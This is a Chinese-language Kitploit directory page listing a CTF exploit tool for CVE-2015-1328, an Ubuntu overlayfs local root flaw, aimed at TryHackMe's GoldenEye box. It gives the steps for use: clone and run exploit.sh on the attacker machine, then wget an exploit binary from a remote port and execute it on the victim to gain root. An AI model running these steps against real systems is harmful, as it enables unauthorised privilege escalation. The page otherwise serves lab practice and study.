Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2015-1328-GoldenEye — 用于CVE-2015-1328的自动本地权限提升利用工具,针对Ubuntu overlayfs,专为CTF环境设计,附带简单的bash部署脚本。 | Kitploit
工具/GitHubGitHub/elit3pwner/cve-2015-1328-goldeneye
权限提升漏洞分析漏洞利用CTF渗透测试
GitHubelit3pwner/cve-2015-1328-goldeneye

CVE-2015-1328-GoldenEye

用于CVE-2015-1328的自动本地权限提升利用工具,针对Ubuntu overlayfs,专为CTF环境设计,附带简单的bash部署脚本。

查看仓库
1041年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2015-1328-GoldenEye

关于漏洞利用:

Linux 内核(即 Linux 内核包)中 overlayfs 实现在 Ubuntu 15.04 及之前版本中,版本低于 3.19.0-21.21 时未能正确检查上层文件系统目录中的文件创建权限,这使得本地用户能够通过在任意挂载命名空间中允许 overlayfs 的配置来获取 root 访问权限。

感谢 rebel

配置

这是一个针对 TryHackMe 中 GoldenEye CTF 的 CVE-2015-1328 自动化漏洞利用。默认情况下,该机器未安装 gcc,因此我将 gcc 配置为 cc,并相应运行漏洞利用以获取 root 权限。

只需克隆仓库并运行 exploit.sh

在攻击者机器上:

安装

只需克隆此仓库——

root@kitploit:~
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh

在受害者机器上:

root@kitploit:~
$ wget http://<目标 IP>:6969/exploit

$ chmod +x exploit

$ ./exploit
下载工具